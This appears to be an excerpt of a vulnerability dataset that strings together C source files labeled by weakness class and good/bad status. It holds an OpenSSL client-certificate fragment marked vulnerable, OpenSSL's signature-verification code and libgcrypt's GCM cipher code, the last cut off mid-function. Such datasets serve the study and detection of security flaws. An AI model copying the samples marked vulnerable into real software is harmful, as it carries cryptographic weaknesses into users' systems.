#ifndef OPENSSL_NO_ENGINE
if (s->ctx->client_cert_engine)
{
i = ENGINE_load_ssl_client_cert(s->ctx->client_cert_engine, s,
SSL_get_client_CA_list(s),
px509, ppkey, NULL, NULL, NULL);
if (i != 0)
return i;
}
#endif
if (s->ctx->client_cert_cb)
i = s->ctx->client_cert_cb(s,px509,ppkey);
return i;
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_2152_1 |
crossvul-cpp_data_good_2310_0 | /* crypto/asn1/a_verify.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <time.h>
#include "cryptlib.h"
#ifndef NO_SYS_TYPES_H
# include <sys/types.h>
#endif
#include <openssl/bn.h>
#include <openssl/x509.h>
#include <openssl/objects.h>
#include <openssl/buffer.h>
#include <openssl/evp.h>
#include "asn1_locl.h"
#ifndef NO_ASN1_OLD
int ASN1_verify(i2d_of_void *i2d, X509_ALGOR *a, ASN1_BIT_STRING *signature,
char *data, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
const EVP_MD *type;
unsigned char *p,*buf_in=NULL;
int ret= -1,i,inl;
EVP_MD_CTX_init(&ctx);
i=OBJ_obj2nid(a->algorithm);
type=EVP_get_digestbyname(OBJ_nid2sn(i));
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
goto err;
}
inl=i2d(data,NULL);
buf_in=OPENSSL_malloc((unsigned int)inl);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
p=buf_in;
i2d(data,&p);
ret=
EVP_VerifyInit_ex(&ctx,type, NULL)
&& EVP_VerifyUpdate(&ctx,(unsigned char *)buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_VerifyFinal(&ctx,(unsigned char *)signature->data,
(unsigned int)signature->length,pkey) <= 0)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
#endif
int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *a,
ASN1_BIT_STRING *signature, void *asn, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
unsigned char *buf_in=NULL;
int ret= -1,inl;
int mdnid, pknid;
if (!pkey)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_PASSED_NULL_PARAMETER);
return -1;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
return -1;
}
EVP_MD_CTX_init(&ctx);
/* Convert signature OID into digest and public key OIDs */
if (!OBJ_find_sigid_algs(OBJ_obj2nid(a->algorithm), &mdnid, &pknid))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
if (mdnid == NID_undef)
{
if (!pkey->ameth || !pkey->ameth->item_verify)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
ret = pkey->ameth->item_verify(&ctx, it, asn, a,
signature, pkey);
/* Return value of 2 means carry on, anything else means we
* exit straight away: either a fatal error of the underlying
* verification routine handles all verification.
*/
if (ret != 2)
goto err;
ret = -1;
}
else
{
const EVP_MD *type;
type=EVP_get_digestbynid(mdnid);
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
/* Check public key OID matches public key type */
if (EVP_PKEY_type(pknid) != pkey->ameth->pkey_id)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_WRONG_PUBLIC_KEY_TYPE);
goto err;
}
if (!EVP_DigestVerifyInit(&ctx, NULL, type, NULL, pkey))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
}
inl = ASN1_item_i2d(asn, &buf_in, it);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
ret = EVP_DigestVerifyUpdate(&ctx,buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_DigestVerifyFinal(&ctx,signature->data,
(size_t)signature->length) <= 0)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_2310_0 |
crossvul-cpp_data_good_892_0 | /* cipher-gcm.c - Generic Galois Counter Mode implementation
* Copyright (C) 2013 Dmitry Eremin-Solenikov
* Copyright (C) 2013, 2018-2019 Jussi Kivilinna <jussi.kivilinna@iki.fi>
*
* This file is part of Libgcrypt.
*
* Libgcrypt is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser general Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* Libgcrypt is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this program; if not, see <http://www.gnu.org/licenses/>.
*/
#include <config.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include "g10lib.h"
#include "cipher.h"
#include "bufhelp.h"
#include "./cipher-internal.h"
/* Helper macro to force alignment to 16 or 64 bytes. */
#ifdef HAVE_GCC_ATTRIBUTE_ALIGNED
# define ATTR_ALIGNED_64 __attribute__ ((aligned (64)))
#else
# define ATTR_ALIGNED_64
#endif
#ifdef GCM_USE_INTEL_PCLMUL
extern void _gcry_ghash_setup_intel_pclmul (gcry_cipher_hd_t c);
extern unsigned int _gcry_ghash_intel_pclmul (gcry_cipher_hd_t c, byte *result,
const byte *buf, size_t nblocks);
#endif
#ifdef GCM_USE_ARM_PMULL
extern void _gcry_ghash_setup_armv8_ce_pmull (void *gcm_key, void *gcm_table);
extern unsigned int _gcry_ghash_armv8_ce_pmull (void *gcm_key, byte *result,
const byte *buf, size_t nblocks,
void *gcm_table);
static void
ghash_setup_armv8_ce_pmull (gcry_cipher_hd_t c)
{
_gcry_ghash_setup_armv8_ce_pmull(c->u_mode.gcm.u_ghash_key.key,
c->u_mode.gcm.gcm_table);
}
static unsigned int
ghash_armv8_ce_pmull (gcry_cipher_hd_t c, byte *result, const byte *buf,
size_t nblocks)
{
return _gcry_ghash_armv8_ce_pmull(c->u_mode.gcm.u_ghash_key.key, result, buf,
nblocks, c->u_mode.gcm.gcm_table);
}
#endif /* GCM_USE_ARM_PMULL */
#ifdef GCM_USE_ARM_NEON
extern void _gcry_ghash_setup_armv7_neon (void *gcm_key);
extern unsigned int _gcry_ghash_armv7_neon (void *gcm_key, byte *result,
const byte *buf, size_t nblocks);
static void
ghash_setup_armv7_neon (gcry_cipher_hd_t c)
{
_gcry_ghash_setup_armv7_neon(c->u_mode.gcm.u_ghash_key.key);
}
static unsigned int
ghash_armv7_neon (gcry_cipher_hd_t c, byte *result, const byte *buf,
size_t nblocks)
{
return _gcry_ghash_armv7_neon(c->u_mode.gcm.u_ghash_key.key, result, buf,
nblocks);
}
#endif /* GCM_USE_ARM_NEON */
#ifdef GCM_USE_TABLES
static struct
{
volatile u32 counter_head;
u32 cacheline_align[64 / 4 - 1];
u16 R[256];
volatile u32 counter_tail;
} gcm_table ATTR_ALIGNED_64 =
{
0,
{ 0, },
{
0x0000, 0x01c2, 0x0384, 0x0246, 0x0708, 0x06ca, 0x048c, 0x054e,
0x0e10, 0x0fd2, 0x0d94, 0x0c56, 0x0918, 0x08da, 0x0a9c, 0x0b5e,
0x1c20, 0x1de2, 0x1fa4, 0x1e66, 0x1b28, 0x1aea, 0x18ac, 0x196e,
0x1230, 0x13f2, 0x11b4, 0x1076, 0x1538, 0x14fa, 0x16bc, 0x177e,
0x3840, 0x3982, 0x3bc4, 0x3a06, 0x3f48, 0x3e8a, 0x3ccc, 0x3d0e,
0x3650, 0x3792, 0x35d4, 0x3416, 0x3158, 0x309a, 0x32dc, 0x331e,
0x2460, 0x25a2, 0x27e4, 0x2626, 0x2368, 0x22aa, 0x20ec, 0x212e,
0x2a70, 0x2bb2, 0x29f4, 0x2836, 0x2d78, 0x2cba, 0x2efc, 0x2f3e,
0x7080, 0x7142, 0x7304, 0x72c6, 0x7788, 0x764a, 0x740c, 0x75ce,
0x7e90, 0x7f52, 0x7d14, 0x7cd6, 0x7998, 0x785a, 0x7a1c, 0x7bde,
0x6ca0, 0x6d62, 0x6f24, 0x6ee6, 0x6ba8, 0x6a6a, 0x682c, 0x69ee,
0x62b0, 0x6372, 0x6134, 0x60f6, 0x65b8, 0x647a, 0x663c, 0x67fe,
0x48c0, 0x4902, 0x4b44, 0x4a86, 0x4fc8, 0x4e0a, 0x4c4c, 0x4d8e,
0x46d0, 0x4712, 0x4554, 0x4496, 0x41d8, 0x401a, 0x425c, 0x439e,
0x54e0, 0x5522, 0x5764, 0x56a6, 0x53e8, 0x522a, 0x506c, 0x51ae,
0x5af0, 0x5b32, 0x5974, 0x58b6, 0x5df8, 0x5c3a, 0x5e7c, 0x5fbe,
0xe100, 0xe0c2, 0xe284, 0xe346, 0xe608, 0xe7ca, 0xe58c, 0xe44e,
0xef10, 0xeed2, 0xec94, 0xed56, 0xe818, 0xe9da, 0xeb9c, 0xea5e,
0xfd20, 0xfce2, 0xfea4, 0xff66, 0xfa28, 0xfbea, 0xf9ac, 0xf86e,
0xf330, 0xf2f2, 0xf0b4, 0xf176, 0xf438, 0xf5fa, 0xf7bc, 0xf67e,
0xd940, 0xd882, 0xdac4, 0xdb06, 0xde48, 0xdf8a, 0xddcc, 0xdc0e,
0xd750, 0xd692, 0xd4d4, 0xd516, 0xd058, 0xd19a, 0xd3dc, 0xd21e,
0xc560, 0xc4a2, 0xc6e4, 0xc726, 0xc268, 0xc3aa, 0xc1ec, 0xc02e,
0xcb70, 0xcab2, 0xc8f4, 0xc936, 0xcc78, 0xcdba, 0xcffc, 0xce3e,
0x9180, 0x9042, 0x9204, 0x93c6, 0x9688, 0x974a, 0x950c, 0x94ce,
0x9f90, 0x9e52, 0x9c14, 0x9dd6, 0x9898, 0x995a, 0x9b1c, 0x9ade,
0x8da0, 0x8c62, 0x8e24, 0x8fe6, 0x8aa8, 0x8b6a, 0x892c, 0x88ee,
0x83b0, 0x8272, 0x8034, 0x81f6, 0x84b8, 0x857a, 0x873c, 0x86fe,
0xa9c0, 0xa802, 0xaa44, 0xab86, 0xaec8, 0xaf0a, 0xad4c, 0xac8e,
0xa7d0, 0xa612, 0xa454, 0xa596, 0xa0d8, 0xa11a, 0xa35c, 0xa29e,
0xb5e0, 0xb422, 0xb664, 0xb7a6, 0xb2e8, 0xb32a, 0xb16c, 0xb0ae,
0xbbf0, 0xba32, 0xb874, 0xb9b6, 0xbcf8, 0xbd3a, 0xbf7c, 0xbebe,
},
0
};
#define gcmR gcm_table.R
static inline
void prefetch_table(const void *tab, size_t len)
{
const volatile byte *vtab = tab;
size_t i;
for (i = 0; len - i >= 8 * 32; i += 8 * 32)
{
(void)vtab[i + 0 * 32];
(void)vtab[i + 1 * 32];
(void)vtab[i + 2 * 32];
(void)vtab[i + 3 * 32];
(void)vtab[i + 4 * 32];
(void)vtab[i + 5 * 32];
(void)vtab[i + 6 * 32];
(void)vtab[i + 7 * 32];
}
for (; i < len; i += 32)
{
(void)vtab[i];
}
(void)vtab[len - 1];
}
static inline void
do_prefetch_tables (const void *gcmM, size_t gcmM_size)
{
/* Modify counters to trigger copy-on-write and unsharing if physical pages
* of look-up table are shared between processes. Modifying counters also
* causes checksums for pages to change and hint same-page merging algorithm
* that these pages are frequently changing. */
gcm_table.counter_head++;
gcm_table.counter_tail++;
/* Prefetch look-up tables to cache. */
prefetch_table(gcmM, gcmM_size);
prefetch_table(&gcm_table, sizeof(gcm_table));
}
#ifdef GCM_TABLES_USE_U64
static void
bshift (u64 * b0, u64 * b1)
{
u64 t[2], mask;
t[0] = *b0;
t[1] = *b1;
mask = -(t[1] & 1) & 0xe1;
mask <<= 56;
*b1 = (t[1] >> 1) ^ (t[0] << 63);
*b0 = (t[0] >> 1) ^ mask;
}
static void
do_fillM (unsigned char *h, u64 *M)
{
int i, j;
M[0 + 0] = 0;
M[0 + 16] = 0;
M[8 + 0] = buf_get_be64 (h + 0);
M[8 + 16] = buf_get_be64 (h + 8);
for (i = 4; i > 0; i /= 2)
{
M[i + 0] = M[2 * i + 0];
M[i + 16] = M[2 * i + 16];
bshift (&M[i], &M[i + 16]);
}
for (i = 2; i < 16; i *= 2)
for (j = 1; j < i; j++)
{
M[(i + j) + 0] = M[i + 0] ^ M[j + 0];
M[(i + j) + 16] = M[i + 16] ^ M[j + 16];
}
for (i = 0; i < 16; i++)
{
M[i + 32] = (M[i + 0] >> 4) ^ ((u64) gcmR[(M[i + 16] & 0xf) << 4] << 48);
M[i + 48] = (M[i + 16] >> 4) ^ (M[i + 0] << 60);
}
}
static inline unsigned int
do_ghash (unsigned char *result, const unsigned char *buf, const u64 *gcmM)
{
u64 V[2];
u64 tmp[2];
const u64 *M;
u64 T;
u32 A;
int i;
cipher_block_xor (V, result, buf, 16);
V[0] = be_bswap64 (V[0]);
V[1] = be_bswap64 (V[1]);
/* First round can be manually tweaked based on fact that 'tmp' is zero. */
M = &gcmM[(V[1] & 0xf) + 32];
V[1] >>= 4;
tmp[0] = M[0];
tmp[1] = M[16];
tmp[0] ^= gcmM[(V[1] & 0xf) + 0];
tmp[1] ^= gcmM[(V[1] & 0xf) + 16];
V[1] >>= 4;
i = 6;
while (1)
{
M = &gcmM[(V[1] & 0xf) + 32];
V[1] >>= 4;
A = tmp[1] & 0xff;
T = tmp[0];
tmp[0] = (T >> 8) ^ ((u64) gcmR[A] << 48) ^ gcmM[(V[1] & 0xf) + 0];
tmp[1] = (T << 56) ^ (tmp[1] >> 8) ^ gcmM[(V[1] & 0xf) + 16];
tmp[0] ^= M[0];
tmp[1] ^= M[16];
if (i == 0)
break;
V[1] >>= 4;
--i;
}
i = 7;
while (1)
{
M = &gcmM[(V[0] & 0xf) + 32];
V[0] >>= 4;
A = tmp[1] & 0xff;
T = tmp[0];
tmp[0] = (T >> 8) ^ ((u64) gcmR[A] << 48) ^ gcmM[(V[0] & 0xf) + 0];
tmp[1] = (T << 56) ^ (tmp[1] >> 8) ^ gcmM[(V[0] & 0xf) + 16];
tmp[0] ^= M[0];
tmp[1] ^= M[16];
if (i == 0)
break;
V[0] >>= 4;
--i;
}
buf_put_be64 (result + 0, tmp[0]);
buf_put_be64 (result + 8, tmp[1]);
return (sizeof(V) + sizeof(T) + sizeof(tmp) +
sizeof(int)*2 + sizeof(void*)*5);
}
#else /*!GCM_TABLES_USE_U64*/
static void
bshift (u32 * M, int i)
{
u32 t[4], mask;
t[0] = M[i * 4 + 0];
t[1] = M[i * 4 + 1];
t[2] = M[i * 4 + 2];
t[3] = M[i * 4 + 3];
mask = -(t[3] & 1) & 0xe1;
M[i * 4 + 3] = (t[3] >> 1) ^ (t[2] << 31);
M[i * 4 + 2] = (t[2] >> 1) ^ (t[1] << 31);
M[i * 4 + 1] = (t[1] >> 1) ^ (t[0] << 31);
M[i * 4 + 0] = (t[0] >> 1) ^ (mask << 24);
}
static void
do_fillM (unsigned char *h, u32 *M)
{
int i, j;
M[0 * 4 + 0] = 0;
M[0 * 4 + 1] = 0;
M[0 * 4 + 2] = 0;
M[0 * 4 + 3] = 0;
M[8 * 4 + 0] = buf_get_be32 (h + 0);
M[8 * 4 + 1] = buf_get_be32 (h + 4);
M[8 * 4 + 2] = buf_get_be32 (h + 8);
M[8 * 4 + 3] = buf_get_be32 (h + 12);
for (i = 4; i > 0; i /= 2)
{
M[i * 4 + 0] = M[2 * i * 4 + 0];
M[i * 4 + 1] = M[2 * i * 4 + 1];
M[i * 4 + 2] = M[2 * i * 4 + 2];
M[i * 4 + 3] = M[2 * i * 4 + 3];
bshift (M, i);
}
for (i = 2; i < 16; i *= 2)
for (j = 1; j < i; j++)
{
M[(i + j) * 4 + 0] = M[i * 4 + 0] ^ M[j * 4 + 0];
M[(i + j) * 4 + 1] = M[i * 4 + 1] ^ M[j * 4 + 1];
M[(i + j) * 4 + 2] = M[i * 4 + 2] ^ M[j * 4 + 2];
M[(i + j) * 4 + 3] = M[i * 4 + 3] ^ M[j * 4 + 3];
}
for (i = 0; i < 4 * 16; i += 4)
{
M[i + 0 + 64] = (M[i + 0] >> 4)
^ ((u64) gcmR[(M[i + 3] << 4) & 0xf0] << 16);
M[i + 1 + 64] = (M[i + 1] >> 4) ^ (M[i + 0] << 28);
M[i + 2 + 64] = (M[i + 2] >> 4) ^ (M[i + 1] << 28);
M[i + 3 + 64] = (M[i + 3] >> 4) ^ (M[i + 2] << 28);
}
}
static inline unsigned int
do_ghash (unsigned char *result, const unsigned char *buf, const u32 *gcmM)
{
byte V[16];
u32 tmp[4];
u32 v;
const u32 *M, *m;
u32 T[3];
int i;
cipher_block_xor (V, result, buf, 16); /* V is big-endian */
/* First round can be manually tweaked based on fact that 'tmp' is zero. */
i = 15;
v = V[i];
M = &gcmM[(v & 0xf) * 4 + 64];
v = (v & 0xf0) >> 4;
m = &gcmM[v * 4];
v = V[--i];
tmp[0] = M[0] ^ m[0];
tmp[1] = M[1] ^ m[1];
tmp[2] = M[2] ^ m[2];
tmp[3] = M[3] ^ m[3];
while (1)
{
M = &gcmM[(v & 0xf) * 4 + 64];
v = (v & 0xf0) >> 4;
m = &gcmM[v * 4];
T[0] = tmp[0];
T[1] = tmp[1];
T[2] = tmp[2];
tmp[0] = (T[0] >> 8) ^ ((u32) gcmR[tmp[3] & 0xff] << 16) ^ m[0];
tmp[1] = (T[0] << 24) ^ (tmp[1] >> 8) ^ m[1];
tmp[2] = (T[1] << 24) ^ (tmp[2] >> 8) ^ m[2];
tmp[3] = (T[2] << 24) ^ (tmp[3] >> 8) ^ m[3];
tmp[0] ^= M[0];
tmp[1] ^= M[1];
tmp[2] ^= M[2];
tmp[3] ^= M[3];
if (i == 0)
break;
v = V[--i];
}
buf_put_be32 (result + 0, tmp[0]);
buf_put_be32 (result + 4, tmp[1]);
buf_put_be32 (result + 8, tmp[2]);
buf_put_be32 (result + 12, tmp[3]);
return (sizeof(V) + sizeof(T) + sizeof(tmp) +
sizeof(int)*2 + sizeof(void*)*6);
}
#endif /*!GCM_TABLES_USE_U64*/
#define fillM(c) \
do_fillM (c->u_mode.gcm.u_ghash_key.key, c->u_mode.gcm.gcm_table)
#define GHASH(c, result, buf) do_ghash (result, buf, c->u_mode.gcm.gcm_table)
#define prefetch_tables(c) \
do_prefetch_tables(c->u_mode.gcm.gcm_table, sizeof(c->u_mode.gcm.gcm_table))
#else
static unsigned long
bshift (unsigned long *b)
{
unsigned long c;
int i;
c = b[3] & 1;
for (i = 3; i > 0; i--)
{
b[i] = (b[i] >> 1) | (b[i - 1] << 31);
}
b[i] >>= 1;
return c;
}
static unsigned int
do_ghash (unsigned char *hsub, unsigned char *result, const unsigned char *buf)
{
unsigned long V[4];
int i, j;
byte *p;
#ifdef WORDS_BIGENDIAN
p = result;
#else
unsigned long T[4];
cipher_block_xor (V, result, buf, 16);
for (i = 0; i < 4; i++)
{
V[i] = (V[i] & 0x00ff00ff) << 8 | (V[i] & 0xff00ff00) >> 8;
V[i] = (V[i] & 0x0000ffff) << 16 | (V[i] & 0xffff0000) >> 16;
}
p = (byte *) T;
#endif
memset (p, 0, 16);
for (i = 0; i < 16; i++)
{
for (j = 0x80; j; j >>= 1)
{
if (hsub[i] & j)
cipher_block_xor (p, p, V, 16);
if (bshift (V))
V[0] ^= 0xe1000000;
}
}
#ifndef WORDS_BIGENDIAN
for (i = 0, p = (byte *) T; i < 16; i += 4, p += 4)
{
result[i + 0] = p[3];
result[i + 1] = p[2];
result[i + 2] = p[1];
result[i + 3] = p[0];
}
#endif
return (sizeof(V) + sizeof(T) + sizeof(int)*2 + sizeof(void*)*5);
}
#define fillM(c) do { } while (0)
#define GHASH(c, result, buf) do_ghash (c->u_mode.gcm.u_ghash_key.key, result, buf)
#define prefetch_tables(c) do {} while (0)
#endif /* !GCM_USE_TABLES */
static unsigned int
ghash_internal (gcry_cipher_hd_t c, byte *result, const byte *buf,
size_t nblocks)
{
const unsigned int blocksize = GCRY_GCM_BLOCK_LEN;
unsigned int burn = 0;
prefetch_tables (c);
while (nblocks)
{
burn = GHASH (c, result, buf);
buf += blocksize;
nblocks--;
}
return burn + (burn ? 5*sizeof(void*) : 0);
}
static void
setupM (gcry_cipher_hd_t c)
{
#if defined(GCM_USE_INTEL_PCLMUL) || defined(GCM_USE_ARM_PMULL)
unsigned int features = _gcry_get_hw_features ();
#endif
if (0)
;
#ifdef GCM_USE_INTEL_PCLMUL
else if (features & HWF_INTEL_PCLMUL)
{
c->u_mode.gcm.ghash_fn = _gcry_ghash_intel_pclmul;
_gcry_ghash_setup_intel_pclmul (c);
}
#endif
#ifdef GCM_USE_ARM_PMULL
else if (features & HWF_ARM_PMULL)
{
c->u_mode.gcm.ghash_fn = ghash_armv8_ce_pmull;
ghash_setup_armv8_ce_pmull (c);
}
#endif
#ifdef GCM_USE_ARM_NEON
else if (features & HWF_ARM_NEON)
{
c->u_mode.gcm.ghash_fn = ghash_armv7_neon;
ghash_setup_armv7_neon (c);
}
#endif
else
{
c->u_mode.gcm.ghash_fn = ghash_internal;
fillM (c);
}
}
static inline void
gcm_bytecounter_add (u32 ctr[2], size_t add)
{
if (sizeof(add) > sizeof(u32))
{
u32 high_add = ((add >> 31) >> 1) & 0xffffffff;
ctr[1] += high_add;
}
ctr[0] += add;
if (ctr[0] >= add)
return;
++ctr[1];
}
static inline u32
gcm_add32_be128 (byte *ctr, unsigned int add)
{
/* 'ctr' must be aligned to four bytes. */
const unsigned int blocksize = GCRY_GCM_BLOCK_LEN;
u32 *pval = (u32 *)(void *)(ctr + blocksize - sizeof(u32));
u32 val;
val = be_bswap32(*pval) + add;
*pval = be_bswap32(val);
return val; /* return result as host-endian value */
}
static inline int
gcm_check_datalen (u32 ctr[2])
{
/* len(plaintext) <= 2^39-256 bits == 2^36-32 bytes == 2^32-2 blocks */
if (ctr[1] > 0xfU)
return 0;
if (ctr[1] < 0xfU)
return 1;
if (ctr[0] <= 0xffffffe0U)
return 1;
return 0;
}
static inline int
gcm_check_aadlen_or_ivlen (u32 ctr[2])
{
/* len(aad/iv) <= 2^64-1 bits ~= 2^61-1 bytes */
if (ctr[1] > 0x1fffffffU)
return 0;
if (ctr[1] < 0x1fffffffU)
return 1;
if (ctr[0] <= 0xffffffffU)
return 1;
return 0;
}
static void
do_ghash_buf(gcry_cipher_hd_t c, byte *hash, const byte *buf,
size_t buflen, int do_padding)
{
unsigned int blocksize = GCRY_GCM_BLOCK_LEN;
unsigned int unused = c->u_mode.gcm.mac_unused;
ghash_fn_t ghash_fn = c->u_mode.gcm.ghash_fn;
size_t nblocks, n;
unsigned int burn = 0;
if (buflen == 0 && (unused == 0 || !do_padding))
return;
do
{
if (buflen > 0 && (buflen + unused < blocksize || unused > 0))
{
n = blocksize - unused;
n = n < buflen ? n : buflen;
buf_cpy (&c->u_mode.gcm.macbuf[unused], buf, n);
unused += n;
buf += n;
buflen -= n;
}
if (!buflen)
{
if (!do_padding)
break;
n = blocksize - unused;
if (n > 0)
{
memset (&c->u_mode.gcm.macbuf[unused], 0, n);
unused = blocksize;
}
}
if (unused > 0)
{
gcry_assert (unused == blocksize);
/* Process one block from macbuf. */
burn = ghash_fn (c, hash, c->u_mode.gcm.macbuf, 1);
unused = 0;
}
nblocks = buflen / blocksize;
if (nblocks)
{
burn = ghash_fn (c, hash, buf, nblocks);
buf += blocksize * nblocks;
buflen -= blocksize * nblocks;
}
}
while (buflen > 0);
c->u_mode.gcm.mac_unused = unused;
if (burn)
_gcry_burn_stack (burn);
}
static gcry_err_code_t
gcm_ctr_encrypt (gcry_cipher_hd_t c, byte *outbuf, size_t outbuflen,
const byte *inbuf, size_t inbuflen)
{
gcry_err_code_t err = 0;
while (inbuflen)
{
u32 nblocks_to_overflow;
u32 num_ctr_increments;
u32 curr_ctr_low;
size_t currlen = inbuflen;
byte ctr_copy[GCRY_GCM_BLOCK_LEN];
int fix_ctr = 0;
/* GCM CTR increments only least significant 32-bits, without carry
* to upper 96-bits of counter. Using generic CTR implementation
* directly would carry 32-bit overflow to upper 96-bit. Detect
* if input length is long enough to cause overflow, and limit
* input length so that CTR overflow happen but updated CTR value is
* not used to encrypt further input. After overflow, upper 96 bits
* of CTR are restored to cancel out modification done by generic CTR
* encryption. */
if (inbuflen > c->unused)
{
curr_ctr_low = gcm_add32_be128 (c->u_ctr.ctr, 0);
/* Number of CTR increments this inbuflen would cause. */
num_ctr_increments = (inbuflen - c->unused) / GCRY_GCM_BLOCK_LEN +
!!((inbuflen - c->unused) % GCRY_GCM_BLOCK_LEN);
if ((u32)(num_ctr_increments + curr_ctr_low) < curr_ctr_low)
{
nblocks_to_overflow = 0xffffffffU - curr_ctr_low + 1;
currlen = nblocks_to_overflow * GCRY_GCM_BLOCK_LEN + c->unused;
if (currlen > inbuflen)
{
currlen = inbuflen;
}
fix_ctr = 1;
cipher_block_cpy(ctr_copy, c->u_ctr.ctr, GCRY_GCM_BLOCK_LEN);
}
}
err = _gcry_cipher_ctr_encrypt(c, outbuf, outbuflen, inbuf, currlen);
if (err != 0)
return err;
if (fix_ctr)
{
/* Lower 32-bits of CTR should now be zero. */
gcry_assert(gcm_add32_be128 (c->u_ctr.ctr, 0) == 0);
/* Restore upper part of CTR. */
buf_cpy(c->u_ctr.ctr, ctr_copy, GCRY_GCM_BLOCK_LEN - sizeof(u32));
wipememory(ctr_copy, sizeof(ctr_copy));
}
inbuflen -= currlen;
inbuf += currlen;
outbuflen -= currlen;
outbuf += currlen;
}
return err;
}
gcry_err_code_t
_gcry_cipher_gcm_encrypt (gcry_cipher_hd_t c,
byte *outbuf, size_t outbuflen,
const byte *inbuf, size_t inbuflen)
{
static const unsigned char zerobuf[MAX_BLOCKSIZE];
